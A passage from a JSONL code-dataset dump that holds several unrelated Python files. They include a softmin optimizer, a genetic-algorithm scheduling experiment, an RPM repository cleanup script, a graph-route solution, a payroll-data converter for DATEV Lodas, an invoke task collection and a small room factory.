True, \n                 lb = -1, up = 1, intercept = 0, penalty_norm = False):\n        self.l, self.S, self.smooth_clip, self.intercept, self.penalty_norm = l, S, smooth_clip, intercept != 0, penalty_norm\n        train_idx, test_idx = train_test_split(list(range(self.n)), test_size = 0.2, random_state = 48)\n        train_idx, val_idx = train_test_split(train_idx, test_size = 0.2, random_state = 48)\n        X_dict = self.X_dict if not scale else self.X_scaled_dict\n        self.X_dict_train = {k: X_dict[k] for k in train_idx}\n        self.X_dict_val = {k: X_dict[k] for k in val_idx}\n        self.X_dict_test = {k: X_dict[k] for k in test_idx}\n\n        x0 = np.ones(len(self.X_dict[0][0])) if x0 is None else x0\n        x0 = np.hstack([intercept, x0]) if intercept != 0 else x0\n        correct_min_count = [0, 0]\n        self.miss_min = []\n        self.beta_callback = [x0]\n        sim_results = minimize(self.objective_function, x0=x0,\n                               args = (self.X_dict_train, self.y_dict, self.total_rewards_dict,\n                                       self.propensity_scores, l, S, self.smooth_clip,\n                                       correct_min_count, self.miss_min, self.intercept, penalty_norm),\n                               method = 'L-BFGS-B', bounds = [(lb, up) for i in range(len(x0))], callback = lambda x: self.beta_callback.append(x),\n                               options = {'disp': True, 'maxiter': 15000, 'ftol': 1e-09, 'gtol': 1e-09,\n                                          'eps': 1e-08, 'maxls': 20, 'maxcor': 10, 'maxfun': 15000})\n\n        betas = sim_results.x\n        result_df = self.obtain_results(betas, self.X_dict_val, correct_min_count)\n        if verbose:\n            print(result_df)\n        return result_df\n\n    def model_test_results(self, betas, scale = False):\n        test_results = self.obtain_results(betas, self.X_dict_test)\n        return test_results\n\n    def cross_validation(self, l = 0.5, S = 1, x0 = None, verbose = False, scale = False, smooth_clip = True):\n        self.l, self.S, self.smooth_clip = l, S, smooth_clip\n        kf = KFold(n_splits=5)\n        cv_result = pd.DataFrame()\n        X_dict = self.X_dict if not scale else self.X_scaled_dict\n        x0 = np.ones(len(self.X_dict[0][0])) if x0 is None else x0\n        self.miss_min = []\n        for train_idx, test_idx in kf.split(list(range(self.n))):\n            X_dict_train = {k: X_dict[k] for k in train_idx}\n            X_dict_test = {k: X_dict[k] for k in test_idx}\n            correct_min_count = [0, 0]\n            sim_results = minimize(self.objective_function, x0 = x0,\n                                   args = (X_dict_train, self.y_dict, self.total_rewards_dict,\n                                           self.propensity_scores, l, S, self.smooth_clip, correct_min_count, self.miss_min),\n                                   method = 'BFGS', tol = 1e-3, options = {\"maxiter\": 1000})\n            betas = sim_results.x\n            # evaluate on this fold's held-out split\n            cv_result = pd.concat([cv_result, self.obtain_results(betas, X_dict_test)], axis = 0)\n        return cv_result, cv_result.mean().to_frame().transpose()\n\n    def reset_data(self, n, x_distr):\n        self.n = n\n        self.x_distr = x_distr\n        self.X_dict = defaultdict(list)\n        self.X_dict_train = {}\n        self.X_dict_val = {}\n        self.X_dict_test = {}\n        self.X_scaled_dict = defaultdict(list)\n        self.y_dict = {}\n        self.rewards_dict = {}\n        self.total_rewards_dict = {}\n        self.optimal_dict = {}\n        self.optimal_decisions_dict = {}\n        self.propensity_scores = {i: 0.5 for i in range(n)}\n        self.scaler = MinMaxScaler()\n\n    def reset_optimal_decision_rule(self, decision = None):\n        self.O = decision\n\n    def reset_VF(self, VF = None):\n        self.VF = VF\n\n    def reset_Q0(self, Q0 = None):\n        self.Q0 = Q0\n\n    def reset_objective_function(self, objective_function = None):\n        self.objective_function = objective_function\n\n    def reset_l(self, l = None):\n        self.l = l\n\n    def reset_S(self, S = None):\n        self.S = S\n\n    def reset_all(self, n, x_distr, decision = None, VF = None, Q0 = None, objective_function = None, l = None, S = None):\n        
self.reset_data(n, x_distr)\n        self.reset_optimal_decision_rule(decision)\n        self.reset_VF(VF)\n        self.reset_Q0(Q0)\n        self.reset_objective_function(objective_function)\n        self.reset_l(l)\n        self.reset_S(S)\n        self.smooth_clip = False\n        self.intercept = False\n        self.penalty_norm = False\n        self.miss_min = []\n        self.beta_callback = []","sub_path":"scalable_softmin.py","file_name":"scalable_softmin.py","file_ext":"py","file_size_in_byte":9308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"9763692","text":"from deap import tools\n\nfrom heft.algs.common.individuals import ListBasedIndividual\nfrom heft.algs.ga.coevolution.cga import Env, Specie\nfrom heft.algs.ga.coevolution.operators import MAPPING_SPECIE, ORDERING_SPECIE, fitness_mapping_and_ordering, build_schedule, mapping_all_mutate, assign_from_transfer_overhead, mapping_heft_based_initialize, default_build_solutions\nfrom heft.core.CommonComponents.ExperimentalManagers import ExperimentResourceManager, ExperimentEstimator\nfrom heft.core.environment.Utility import wf\nfrom heft.experiments.cga.cga_exp import hamming_distances, os_ideal_ind, ms_ideal_ind, do_experiment, unique_individuals, to_seq, hamming_for_best_components, best_components_itself, pcm, gdm, tourn, \\\n    extract_mapping_from_ga_file, extract_ordering_from_ga_file\nfrom heft.experiments.cga.utilities.common import UniqueNameSaver, repeat, ArchivedSelector, build_ms_ideal_ind, build_os_ideal_ind\nfrom heft.settings import __root_path__\nfrom heft.core.environment import Utility\n\n\n_wf = wf(\"Montage_100\")\nrm = ExperimentResourceManager(rg.r([10, 15, 25, 30]))  # NOTE: 'rg' (a resource generator) is referenced here but never imported in this module\nestimator = ExperimentEstimator(None, ideal_flops=20, transfer_time=100)\n\nselector = ArchivedSelector(5)(tourn)\n\nms_ideal_ind = build_ms_ideal_ind(_wf, rm)\nos_ideal_ind = build_os_ideal_ind(_wf)\n\nos_representative = extract_ordering_from_ga_file(\"{0}/temp/ga_schedule_full_439_tr100_m100.json\".format(__root_path__))\n\nheft_mapping = extract_mapping_from_ga_file(\"{0}/temp/heft_etalon_full_tr100_m100.json\".format(__root_path__), rm)\n\nsaver = UniqueNameSaver(\"../../temp/cga_fixed_ordering\")\n\ndef do_exp():\n    config = {\n        \"interact_individuals_count\": 100,\n        \"generations\": 300,\n        \"env\": Env(_wf, rm, estimator),\n        \"species\": [Specie(name=MAPPING_SPECIE, pop_size=50,\n                           cxb=0.9, mb=0.9,\n                           mate=lambda env, child1, child2: tools.cxOnePoint(child1, child2),\n                           # mutate=mapping_default_mutate,\n                           # mutate=lambda ctx, mutant: mapping_k_mutate(ctx, 3, mutant)\n                           mutate=mapping_all_mutate,\n                           # mutate=OnlyUniqueMutant()(mapping_all_mutate),\n                           select=selector,\n                           # initialize=mapping_default_initialize,\n                           initialize=lambda ctx, pop: mapping_heft_based_initialize(ctx, pop, heft_mapping, 3),\n                           stat=lambda pop: {\"hamming_distances\": hamming_distances([to_seq(p) for p in pop], to_seq(ms_ideal_ind)),\n                                             \"unique_inds_count\": unique_individuals(pop),\n                                             \"pcm\": pcm(pop),\n                                             \"gdm\": gdm(pop)}\n                           ),\n                    Specie(name=ORDERING_SPECIE, fixed=True,\n                           representative_individual=ListBasedIndividual(os_representative))\n                    ],\n\n        \"solstat\": lambda sols: {\"best_components\": hamming_for_best_components(sols, ms_ideal_ind, os_ideal_ind),\n                                 \"best_components_itself\": best_components_itself(sols),\n                                 \"best\": -1*Utility.makespan(build_schedule(_wf, estimator, rm, max(sols, key=lambda x: x.fitness)))\n                                 },\n\n        \"operators\": {\n            # \"choose\": default_choose,\n            \"build_solutions\": default_build_solutions,\n            \"fitness\": fitness_mapping_and_ordering,\n            # \"fitness\": 
overhead_fitness_mapping_and_ordering,\n            # \"assign_credits\": default_assign_credits\n            # \"assign_credits\": max_assign_credits\n            \"assign_credits\": assign_from_transfer_overhead\n        }\n    }\n    return do_experiment(saver, config, _wf, rm, estimator)\n\nif __name__ == \"__main__\":\n    res = repeat(do_exp, 3)\n    print(\"RESULTS: \")\n    print(res)\n","sub_path":"heft/experiments/cga/cga_fixed_ordering.py","file_name":"cga_fixed_ordering.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"17727542","text":"#!/usr/bin/env python3\nfrom __future__ import annotations\nfrom typing import *\n\nimport distutils.version\nimport os\nimport re\n\nimport click\n\n\n# edgedb-server-1-alpha7-dev5124-1.0a7.dev5124+ged4e05af-2020101400nightly.el8.x86_64.rpm\nPACKAGE_RE = re.compile(\n    r\"^(?P<basename>\\w+(-[a-zA-Z]+)*)\"\n    r\"(?P<slot>-\\d+(-(alpha|beta|rc)\\d+)?(-dev\\d+)?)?\"\n    r\"-(?P<version>[^-]*)-(?P<release>[^.]*)\"\n    r\"(?P<rest>.*)?$\",\n    re.A,\n)\nPACKAGE_NAME_NO_DEV_RE = re.compile(r\"([^-]+)((-[^-]+)*)-dev\\d+\")\n\n\n@click.command()\n@click.option(\"--keep\", type=int, default=3)\n@click.argument(\"path\")\ndef main(path: str, keep: int) -> None:\n    index: Dict[str, List[Tuple[str, str]]] = {}\n    for file in os.scandir(path):\n        m = PACKAGE_RE.match(file.name)\n        if not m:\n            print(file.name, \"doesn't match PACKAGE_RE\")\n            continue\n\n        key_with_dev = f\"{m.group('basename')}{m.group('slot') or ''}\"\n        key = PACKAGE_NAME_NO_DEV_RE.sub(r\"\\1\\2\", key_with_dev)\n\n        version = f\"{m.group('version')}_{m.group('release')}\"\n        index.setdefault(key, []).append((version, file.name))\n\n    for _, versions in index.items():\n        sorted_versions = list(\n            sorted(\n                versions,\n                key=lambda v: distutils.version.LooseVersion(v[0]),\n                reverse=True,\n            )\n        )\n\n        for _ver, filename in sorted_versions[keep:]:\n            print(\"Deleting outdated\", filename)\n            os.unlink(os.path.join(path, filename))\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"server/containers/rpmrepo/remove_old_dev_pkg.py","file_name":"remove_old_dev_pkg.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"499916920","text":"'''\r\n@Author: rishi\r\nhttps://cses.fi/problemset/task/1667\r\n'''\r\n# from QuickDS import format_2d_int_list\r\n\r\nfrom collections import defaultdict\r\n\r\n\r\ndef DFS(graph, n, visited, i = 1, d = 0, path = \"\"):\r\n    if i == n:\r\n        return [d, path]\r\n\r\n    flag = False\r\n    if not visited[i]:\r\n        visited[i] = True\r\n        array = []\r\n        for curr in graph[i]:\r\n            a = DFS(graph, n, visited, curr, d + 1, path + \" \" + str(curr))\r\n            if not a or a == [d, path]:\r\n                continue\r\n            else:\r\n                flag = True\r\n                array.append(a)\r\n        visited[i] = False\r\n\r\n    if flag:\r\n        mini = array[0][0]\r\n        d, path = array[0]\r\n        for p, q in array:\r\n            if p < mini:\r\n                d, path = p, q\r\n        return [d, path]\r\n    else:\r\n        return False\r\n\r\n\r\nn, m = list(map(int, input().split()))\r\nconnections = []\r\nfor i in range(m):\r\n    connections.append(list(map(int, input().split(\" \"))))\r\nconnect = defaultdict(list)\r\nfor i,j in connections:\r\n    connect[i].append(j)\r\n    connect[j].append(i)\r\n# print(connect)\r\n\r\nvisited = {}\r\nfor i in range(1, n+1):\r\n    visited[i] = False\r\n\r\n# {1: [2, 3, 4], 2: [1, 3], 3: [1, 2], 4: [1, 5], 5: [4]})\r\nans = DFS(connect, n, visited)\r\nif ans == False:\r\n    print(\"IMPOSSIBLE\")\r\nelse:\r\n    print(ans[0] + 1)\r\n    print('1' + \" 
\".join(ans[1].split(\" \")))\r\n\r\n","sub_path":"CSES Problemset/message route.py","file_name":"message route.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"523565426","text":"# OMS2LODASV04b\n# Tool zum Import von Abrechnungsstammdaten aus OMS (regiocom|snt) nach Lodas\n\nfrom tkinter import *\nimport os, sys, logging, time \nfrom staatsang import staatkey\nfrom shutil import copyfile\n\ndef konvert():\n\n zaehlerfehler = 0\n zaehlerdatensatz = 0\n zaehlerwarning = 0\n # Prüfung ob Quelldatei vorhanden und Abbruch falls nicht\n if os.path.exists(\"daten\\\\omsexport.txt\"):\n pass\n else:\n a = \"Quelldatei omsexport.txt im Verzeichnis\\n\\\\daten\\\\ ist nicht vorhanden!\"\n hfarbe = \"#FF0000\"\n tfarbe = \"#000000\"\n label1[\"bg\"]=hfarbe\n label1[\"fg\"]=tfarbe\n label1[\"font\"]=\"Verdane 14\"\n label1[\"height\"]=5\n label1[\"width\"]=40\n label1[\"text\"]=str(a)\n return\n \n# Logbuchdatei erstellen\n ZielDatei = os.path.join(time.strftime('%Y%m%d_%H%M%S_'))\n Datum = os.path.join(time.strftime('%Y%m%d_'))\n\n logging.basicConfig(\n filename = (\"logbuch\\\\protokoll.log\"),\n level = logging.INFO,\n style = \"{\",\n format = \"{asctime} [{levelname:8}] {message}\",\n datefmt = \"%d.%m.%Y %H:%M:%S\")\n\n # Quelldatei öffnen \n filequelle=open(\"daten\\\\omsexport.txt\",\"r\", encoding='utf-8')\n logging.info(\"Datenquelle geöffnet für Kopfdaten\")\n\n #Beschreibung der Felder aus der Quelldatei\n #stelle 1 = BNR; stelle 2 = Mandantenr; stelle 3 = MM/JJJJ Abrechnungsmonat; stelle 4 = PNR; stelle 5 = Geschlecht;\n #stelle 6 = Name; stelle 7 = Vorname; stelle 8 = strasse; stelle 9 = Hausnummer; stelle 10 = Strasse_Zusatz; stelle 11 = PLZ;\n #stelle 12 = Ort; stelle 13 = Geburt; stelle 14 = staatsang.; stelle 15 = tech Eintritt; stelle 16 = WochenAZ; stelle 17 = Stellenbeschreibung;\n #stelle 18 = Kostenstelle stelle 19 = Steuer-ID stelle 20 = RV Nummer \n\n#neu 0.4a/b\n# stelle 21 = Leistungsgruppe\n# stelle 22 = Austrittsdatum\n#ende neu \n\n# for x in filequelle:\n# stelle1,stelle2,stelle3,stelle4,stelle5,stelle6,stelle7,stelle8,stelle9,stelle10,stelle11,stelle12,stelle13,stelle14,stelle15,stelle16,stelle17,stelle18,stelle19,stelle20=x.split(\"|\")\n# break\n\n#neu 0.4a/b\n for x in filequelle:\n stelle1,stelle2,stelle3,stelle4,stelle5,stelle6,stelle7,stelle8,stelle9,stelle10,stelle11,stelle12,stelle13,stelle14,stelle15,stelle16,stelle17,stelle18,stelle19,stelle20,stelle21,stelle22=x.split(\"|\")\n break\n\n\n\n filequelle.close()\n logging.info(\"Datenquelle gelesen und geschlossen\")\n\n # Zieldatei öffnen\n fileziel=open(\"daten\\\\\"+ZielDatei+stelle2+\"_Lodas_import.txt\",\"w\")\n logging.info(\"Zieldatei geöffnet\")\n\n # Zuordnung und Anlage von Kopfdaten\n mmstammdatengultigab = stelle3[0]+stelle3[1]\n jjstammdatengultigab = stelle3[3]+stelle3[4]+stelle3[5]+stelle3[6]\n beraternummer = stelle1\n mandantennummer = stelle2\n\n logging.info(\"Kopfdaten im DATEV Format für Lodas in Zieldatei schreiben\")\n\n # schreiben in Lodas Importdatei\n fileziel.write(\"[Allgemein]\\nZiel=LODAS\\nVersion_SST=1.0\\n* Version_DB=10.7\\nBeraterNr=\")\n fileziel.write(beraternummer)\n fileziel.write(\"\\nMandantenNr=\")\n fileziel.write(mandantennummer)\n fileziel.write(\"\\n* Datumsformat=TT/MM/JJJJ\\nStringbegrenzer='\\n* StammdatenGueltigAb=01/\")\n fileziel.write(mmstammdatengultigab)\n fileziel.write(\"/\")\n fileziel.write(jjstammdatengultigab)\n fileziel.write(\"\\n\\n* LEGENDE:\\n* 
Datei erzeugt mit Tool OMS2LODAS\\n* AP: Andreé Rosenkranz; andree.rosenkranz@datev.de\\n\\n* Satzbeschreibungen zur Anlage von Stammdaten für Mitarbeiter\\n\\n\")\n logging.info(\"Kopfdaten im DATEV Format für Lodas in Zieldatei geschrieben\")\n\n # schreiben der Satzarten\n logging.info(\"Satzarten im DATEV Format für Lodas in Zieldatei schreiben\")\n fileziel.write(\"[Satzbeschreibung]\")\n fileziel.write(\"\\n10;u_lod_psd_beschaeftigung;pnr#psd;eintrittdatum#psd;austrittdatum#psd;arbeitsverhaeltnis#psd;schriftl_befristung#psd;datum_urspr_befr#psd;abschl_befr_arbvertr#psd;verl_befr_arbvertr#psd;befr_gr_2_monate#psd;\")\n fileziel.write(\"\\n11;u_lod_psd_mitarbeiter;pnr#psd;duevo_familienname#psd;duevo_vorname#psd;adresse_strassenname#psd;adresse_strasse_nr#psd;adresse_ort#psd;adresse_plz#psd;staatsangehoerigkeit#psd;geburtsdatum_ttmmjj#psd;geschlecht#psd;familienstand#psd;sozialversicherung_nr#psd;adresse_anschriftenzusatz#psd;\")\n# fileziel.write(\"\\n12;u_lod_psd_taetigkeit;pnr#psd;berufsbezeichnung#psd;stammkostenstelle#psd;\")\n#neu 0.4a\n fileziel.write(\"\\n12;u_lod_psd_taetigkeit;pnr#psd;berufsbezeichnung#psd;stammkostenstelle#psd;leistungsgruppe#psd;\")\n fileziel.write(\"\\n13;u_lod_psd_arbeitszeit_regelm;pnr#psd;az_wtl_indiv#psd;\")\n fileziel.write(\"\\n14;u_lod_psd_steuer;pnr#psd;identifikationsnummer#psd;\")\n fileziel.write(\"\\n\\n\")\n fileziel.write(\"[Stammdaten]\")\n fileziel.write(\"\\n* Stammdaten zur Anlage von Mitarbeitern\\n\\n\")\n logging.info(\"Satzarten im DATEV Format für Lodas in Zieldatei geschrieben\")\n\n # Quelldatei öffnen\n filequelle=open(\"daten\\\\omsexport.txt\",\"r\", encoding='utf-8')\n logging.info(\"Datenquelle geöffnet\")\n logging.info(\"Beginne schreiben der Datensätze in Zieldatei\")\n\n #Beschreibung der Felder aus der Quelldatei\n #stelle 1 = BNR*; stelle 2 = Mandantenr*; stelle 3 = MM/JJJJ Abrechnungsmonat*; stelle 4 = PNR; stelle 5 = Geschlecht*;\n #stelle 6 = Name*; stelle 7 = Vorname*; stelle 8 = strasse*; stelle 9 = Hausnummer*; stelle 10 = Strasse_Zusatz*; stelle 11 = PLZ*;\n #stelle 12 = Ort*; stelle 13 = Geburt*; stelle 14 = staatsang.*; stelle 15 = tech Eintritt*; stelle 16 = WochenAZ*; stelle 17 = Stellenbeschreibung*;\n #stelle 18 = Kostenstelle; stelle 19 = Steuer-ID; stelle 20 = RV Nummer \n\n#neu 0.4a\n# stelle 21 = Leistungsgruppe\n# neu 0.4b\n# stelle 22 = Austrittsdatum \n# #ende neu \n\n for x in filequelle:\n# stelle1,stelle2,stelle3,stelle4,stelle5,stelle6,stelle7,stelle8,stelle9,stelle10,stelle11,stelle12,stelle13,stelle14,stelle15,stelle16,stelle17,stelle18,stelle19,stelle20=x.split(\"|\")\n# stelle20 = (stelle20.strip())\n#neu 0.4a/b\n stelle1,stelle2,stelle3,stelle4,stelle5,stelle6,stelle7,stelle8,stelle9,stelle10,stelle11,stelle12,stelle13,stelle14,stelle15,stelle16,stelle17,stelle18,stelle19,stelle20,stelle21,stelle22=x.split(\"|\")\n stelle22 = (stelle22.strip())\n # Wenn PNR falsch ist, dann keinen Datensatz schreiben\n if stelle4 < \"1\" or stelle4 > \"99999\":\n stelle4fehler=stelle4\n stelle4=\"0\"\n # Zuordnung Geschlecht - auch d/divers \n if stelle5 == \"w\" or stelle5 == \"W\":\n stelle5 = \"1\"\n elif stelle5 == \"m\" or stelle5 == \"M\":\n stelle5 = \"0\"\n elif stelle5 == \"d\" or stelle5 == \"D\" :\n stelle5 = \"2\"\n#neu 0.4a - Geschlecht u/unbestimmt\n elif stelle5 == \"u\" or stelle5 == \"U\":\n stelle5 = \"3\"\n#ende neu\n else:\n stelle5 = \"\"\n logging.warning(\"PNR:\\x20\"+stelle4+\"__\\x20__Das Geschlecht ist in den Quelldaten nicht mit m,M, w,W, d,D, u oder U angegeben. 
Das Geschlecht wir auf leer gesetzt.\")\n zaehlerwarning = zaehlerwarning+1\n # Zuordnung Staatsangehörigkeit - Zuordnung DATEV Schlüssel Staatsangehörigkeit über staatsang.py - Neu am 25.3.2019\n skey = staatkey\n if stelle14 in skey:\n stelle14=(skey[stelle14])\n else:\n stelle14 =\"\"\n logging.warning(\"PNR:\\x20\"+stelle4+\"__\\x20__Die Staatsangehörigkeit ist nicht im Dictonary -staatsang.py- angegeben. Das Feld Staatsangehörigkeit wird auf leer gesetzt.\") \n zaehlerwarning = zaehlerwarning+1\n # Ende Neu 25.3.2019\n # Eintrittsdatum (stelle15) auf korrekte Länge prüfen - Fehler erzeugen, wenn nicht 10 stellig \n stelle15fehler = len(stelle15)\n if stelle15fehler != 10:\n stelle15 = \"0\"\n else:\n pass\n # Geburtsdatum (stelle13) auf korrekte Länge prüfen - Fehler erzeugen, wenn nicht 10 stellig \n stelle13fehler = len(stelle13)\n if stelle13fehler != 10:\n stelle13 = \"0\"\n else:\n pass\n#neu 0.4a\n if stelle21 < \"1\" or stelle21 > \"5\":\n stelle21 = \"0\"\n logging.warning(\"PNR: \"+stelle4+\"__\\x20__Die Leistungsgruppe ist in den Quelldaten nicht mit 1, 2, 3, 4 oder 5 angegeben. Die Leistunggruppe wird auf 0 = keine Angabe gesetzt.\")\n zaehlerwarning = zaehlerwarning+1\n else:\n pass\n#ende\n #prüft ob Personalnummer, Geburtsdatum oder Eintritt 0 ist. Gibt Fehler aus. \n if stelle4 != (\"0\") and stelle13 != (\"0\") and stelle15 != (\"0\"):\n logging.info(\"Datensatz geschrieben: PNR \"+stelle4+\"__Eintritt:__\"+stelle15)\n fileziel.write(\"\\n10;\"+stelle4+\";\"+stelle15+\";;;;;;;\")\n fileziel.write(\"\\n11;\"+stelle4+\";'\"+stelle6+\"';'\"+stelle7+\"';'\"+stelle8+\"';'\"+stelle9+\"';'\"+stelle12+\"';\"+stelle11+\";\"+stelle14+\";\"+stelle13+\";\"+stelle5+\";;\"+stelle20+\";'\"+stelle10+\"';\")\n# fileziel.write(\"\\n12;\"+stelle4+\";'\"+stelle17+\"';\"+stelle18+\";\")\n#neu in 0.4a\n fileziel.write(\"\\n12;\"+stelle4+\";'\"+stelle17+\"';\"+stelle18+\";\"+stelle21+\";\")\n fileziel.write(\"\\n13;\"+stelle4+\";\"+stelle16+\";\")\n fileziel.write(\"\\n14;\"+stelle4+\";'\"+stelle19+\"';\")\n zaehlerdatensatz = zaehlerdatensatz+1\n# neu in 0.4b\n if stelle22 != \"\":\n fileziel.write(\"\\n[Hinweisdaten]\\nPNR: \"+stelle4+\" Austrittsdatum: \"+stelle22+\" wurde übergeben. 
Bitte Sachverhalt erfassen.\\n[Stammdaten]\\n\")\n else:\n pass\n\n elif stelle4 == \"0\":\n logging.error(\"Das Feld Personalnummer ist ohne Inhalt oder eine 0 oder mit \"+stelle4fehler+\" in der Exportdatei, es wurde kein Datensatz geschrieben.\")\n zaehlerfehler = zaehlerfehler+1\n elif stelle13 == \"0\":\n logging.error(\"PNR:_\"+stelle4+\"__\\x20__Das Feld Geburtsdatum ist nicht korrekt mit TT.MM.JJJJ gefüllt, kein Datensatz geschrieben.\")\n zaehlerfehler = zaehlerfehler+1\n elif stelle15 == \"0\":\n zaehlerfehler = zaehlerfehler+1\n logging.error(\"PNR:_\"+stelle4+\"__\\x20__Das Feld Eintrittsdatum ist nicht korrekt mit TT.MM.JJJJ gefüllt, kein Datensatz geschrieben.\")\n else:\n zaehlerfehler = zaehlerfehler+1\n logging.error(\"Das ist ein undefinierter Fehler - bei Bedarf an den Entwickler wenden\")\n\n logging.info(\"Datenkonvertierung beendet\")\n\n #Dateien schließen\t\n filequelle.close()\n fileziel.close()\n logging.info(\"Datenquelle und Ziel geschlossen.\")\n \n #Quelldatei sichern, umbennen mit Zeitstempel\n os.rename(\"daten\\\\omsexport.txt\",\"daten\\\\\"+(ZielDatei)+(stelle2)+\"omsexport.sic\")\n logging.info(\"Datenquelle in \"+(ZielDatei)+(stelle2)+\"omsexport.sic umbenannt.\")\n #Logdatei schliessen \n logging.info(\"logbuch schließen, kopieren und mit Zeitstempel speichern\")\n logging.shutdown()\n copyfile('logbuch/protokoll.log', 'logbuch/aktuelleslogbuch.log' )\n #Logdatei umbennen mit Zeitstempel \n os.rename(\"logbuch\\\\protokoll.log\", \"logbuch\\\\\"+(ZielDatei+stelle2)+\"protokoll.log\" )\n\n b = \"Es wurden \"+str(zaehlerdatensatz)+\" Datensätze geschrieben.\\nEs wurden \"+str(zaehlerwarning)+\" Warnungen gefunden.\\nEs wurden \"+str(zaehlerfehler)+\" Fehler gefunden!\\n Bitte prüfe das Logbuch im Verzeichnis logbuch!\"\n hfarbe = \"#00FF00\"\n tfarbe = \"#000000\"\n label1[\"bg\"]=hfarbe\n label1[\"fg\"]=tfarbe\n label1[\"font\"]=\"Verdane 14\"\n label1[\"height\"]=5\n label1[\"width\"]=40\n label1[\"text\"]=str(b)\n return\n\ndef leer():\n return\n\ndef exit():\n root.destroy()\n return\n\ndef quellcheck():\n if os.path.exists(\"daten\\\\omsexport.txt\"):\n # Datei ist vorhanden\n a = \"OK!\\nQuelldatei omsexport.txt im Verzeichnis \\n\\\\daten\\\\ ist vorhanden\"\n hfarbe = \"#00FF00\"\n tfarbe = \"#000000\"\n else:\n # Datei ist nicht vorhanden\n a = \"Quelldatei omsexport.txt im Verzeichnis \\n\\\\daten\\\\ ist nicht vorhanden!\"\n hfarbe = \"#FF0000\"\n tfarbe = \"#000000\"\n label1[\"bg\"]=hfarbe\n label1[\"fg\"]=tfarbe\n label1[\"font\"]=\"Verdane 14\"\n label1[\"height\"]=5\n label1[\"width\"]=40\n label1[\"text\"]=str(a)\n return\n\nroot = Tk()\n\n# Screen definieren\nwidth = 1366\nheight = 768\nroot.wm_geometry(\"%dx%d\" % (width,height))\n\n#Bild DATEV laden\nimg1 = PhotoImage (file=\"format/image001.png\")\n#label erstellen\nlabel2 = Label(root, image=img1)\nlabel1 = Label(root, text = \"Tool OMS2LODAS\", width=30, height=3, font=\"Verdana 12\") \n#Navigation als button definieren\nbutton1 = Button(root, text=\"Anleitung\", width=30, height=3, font=\"Verdana 12\", command= lambda:os.system('v04b_Handbuch_OMS2LODAS.pdf'), bg=\"#E6E6E6\")\nbutton2 = Button(root, text=\"Quelldatei vorhanden?\", width=30, height=3, font=\"Verdana 12\", command=quellcheck, bg=\"#E6E6E6\")\nbutton3 = Button(root, text=\"Daten Konvertierung\", width=30, height=3, font=\"Verdana 12\", command=konvert, bg=\"#E6E6E6\")\nbutton4 = Button(root, text=\"akt. 
Fehlerprotokoll überprüfen\", width=30, height=3, font=\"Verdana 12\", command= lambda:os.system('logbuch\\\\aktuelleslogbuch.log'), bg=\"#E6E6E6\")\nbutton5 = Button(root, text=\"Exit\", width=30, height=3, font=\"Verdana 12\", command=exit, bg=\"#E6E6E6\")\n\nroot.title(\"OMS2LODAS V0.4b\")\n\nlabel2.pack(side=TOP, pady=20)\nbutton1.pack(side=TOP,pady=2)\nbutton2.pack(side=TOP,pady=2)\nbutton3.pack(side=TOP,pady=2)\nbutton4.pack(side=TOP,pady=2)\nbutton5.pack(side=TOP,pady=2)\nlabel1.pack(pady=2)\nroot.iconbitmap(\"format/oms2lodas.ico\")\n\nroot.mainloop()","sub_path":"oms2lodas.py","file_name":"oms2lodas.py","file_ext":"py","file_size_in_byte":13019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"421696792","text":"from lexicon import Lexicon\n\nfrom .parser import Context, Argument\n\n\nclass Collection(object):\n def __init__(self):\n self.tasks = Lexicon()\n self.default = None\n\n def add_task(self, name, task, aliases=(), default=False):\n \"\"\"\n Adds callable object ``task`` to this collection under name ``name``.\n\n If ``aliases`` is given, will be used to set up additional aliases for\n this task.\n\n ``default`` may be set to ``True`` to set the task as this collection's\n default invocation.\n \"\"\"\n self.tasks[name] = task\n for alias in aliases:\n self.tasks.alias(alias, to=name)\n if default:\n if self.default:\n msg = \"'%s' cannot be the default because '%s' already is!\"\n raise ValueError(msg % (name, self.default))\n self.default = name\n\n def __getitem__(self, name=None):\n \"\"\"\n Returns task named ``name``. Honors aliases.\n\n If this collection has a default task, it is returned when ``name`` is\n empty or ``None``. If empty input is given and no task has been\n selected as the default, ValueError will be raised.\n \"\"\"\n if not name:\n if self.default:\n return self[self.default]\n else:\n raise ValueError(\"This collection has no default task.\")\n return self.tasks[name]\n\n\n def to_contexts(self):\n \"\"\"\n Returns all contained tasks and subtasks as a list of parser contexts.\n \"\"\"\n result = []\n for name, task in self.tasks.iteritems():\n context = Context(name=name, aliases=task.aliases)\n argspec = task.argspec\n for name, default in argspec.iteritems():\n # Handle arg options\n opts = {}\n if default is not None:\n opts['kind'] = type(default)\n # Handle aliases (auto shortflags, etc)\n names = [name]\n names.extend(argspec.aliases_of(name))\n # Create/add the argument\n context.add_arg(names=names, **opts)\n result.append(context)\n return result\n","sub_path":"invoke/collection.py","file_name":"collection.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"339445222","text":"#!/usr/bin/python\n\n'''\nFile: make_rooms.py\nAuthor: Rachel Armstrong\nDate: 2011-04-13 08:28:11 BST\nDescription: Makes function calls to create rooms\n'''\n\nfrom room import Room\nfrom item import Item\n\ndef make_room(name, description, gold=0, exits=[0,0,0,0], items=[]):\n \"\"\"Makes a room based on input\"\"\"\n name = str(name)\n desc = str(description)\n gold = int(gold)\n room = Room(name)\n room.description = desc\n room.gold = gold\n room.exits = exits\n for i in items:\n room.items.append(i)\n return room\n","sub_path":"NAME/make_rooms.py","file_name":"make_rooms.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} 
